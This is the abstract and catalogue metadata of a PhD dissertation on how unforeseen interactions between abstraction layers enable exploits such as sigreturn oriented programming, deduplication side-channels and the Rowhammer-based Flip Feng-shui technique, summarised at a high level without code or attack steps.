Abstract
Abstractions are fundamental to software engineering. Modern systems are
simply too complex for any single person to completely keep in their head, and
abstractions are a great way to divide up required functionality into separate
components. This allows for division of labor and simplifies reasoning about
the correctness of parts of the system.
However, hiding implementation details behind abstractions can conceal problems
that implementations might have. On top of that, confusion about what exact
functionality an abstraction provides can also lead to flaws that can be exploited
by attackers.
Exploit development is a software engineering discipline in itself, and as
such, also often makes use of abstractions. While an attacker has to work with
the implementations of their target system, they are not restricted to viewing
this system through the same abstractions. Sometimes un(der)specified
behaviors in the implementation of one abstraction, which in isolation seem
innocuous, can interact with other parts of a system to create a new flaw, or
exacerbate an existing one.
This dissertation explores three ways in which unforeseen interactions between
abstraction layers can lead to security vulnerabilities, or make them worse.
First, we explore how the choice of implementation of an obscure part of
UNIX/Linux operating system enables an exploitation technique called sigreturn oriented programming. It
turns out that this gives attackers a lot of control over a program's execution
state, simplifying writing exploits greatly. In some cases, it even allows for
exploits that work regardless of what specific version of a vulnerable program
is being exploited.
Next, we examine the security implications of Memory Deduplication, a
performance optimization commonly found in both virtualization environments and
operating systems. Our work shows how Deduplication can be abused as a
side-channel in a more powerful way than was previously known. Furthermore, by
combining this side-channel to leak data, with a hardware flaw called Rowhammer
to cause a useful corruption informed by this data, we show that it is possible
to exploit a browser without making use of any flaws in that browser.
Finally we combine Rowhammer and Deduplication in a different way to create a
precise memory corruption primitive in a technique we call Flip Feng-shui.
Here, Deduplication is used as a means to get more control over
an otherwise random memory corruption. This enables us to corrupt cryptographic
key material, and configuration files, and allows us to take over a virtual machine
from another virtual machine that runs on the same hardware.
Original language | English |
---|---|
Qualification | PhD |
Awarding Institution |
|
Supervisors/Advisors |
|
Award date | 19 Nov 2024 |
Print ISBNs | 9789464736120 |
DOIs | |
Publication status | Published - 19 Nov 2024 |
Keywords
- Exploitation
- Weird Machines
- Rowhammer
- Memory Deduplication
- Side-channels
- Sigreturn Oriented Programming